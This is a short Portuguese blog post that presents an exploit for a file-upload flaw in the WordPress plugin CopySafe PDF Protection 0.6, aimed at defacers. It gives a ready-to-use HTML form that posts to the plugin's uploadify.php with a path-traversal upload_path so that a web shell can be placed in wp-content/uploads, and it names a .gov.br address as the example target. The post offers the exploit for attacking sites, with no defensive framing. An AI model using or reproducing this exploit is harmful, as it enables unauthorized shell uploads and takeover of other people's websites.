0x WordPress CopySafe PDF Protection 0.6 Shell Upload
Continuando a serie de bugs voltados para o famoso wordpress dessa vez apresentamos um dos mais estúpidos que podem existir, esse bug possibilita o defacer fazer o upload de uma shell sem trabalho algum.
A vulnerabilidade fica alocada em lib/uploadify/uploadify.php com isso permite o upload de uma shell sem trabalho algum apos o upload a shell se aloca em http://site.gov.br/wp-content/uploads/shell.php
Bom mas vamos ao codigo do exploit que devera ser salvo como xpl.html no seu pc :)
- <form
- action="http://website.com/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php"
- method="post"
- enctype="multipart/form-data">
- <label for="file">Filename:</label>
- <input type="file" name="wpcsp_file" ><br>
- <input type=text name="upload_path" value="../../../../uploads/">
- <input type="submit" name="submit" value="Submit">
- </form>
Nenhum comentário:
Postar um comentário
............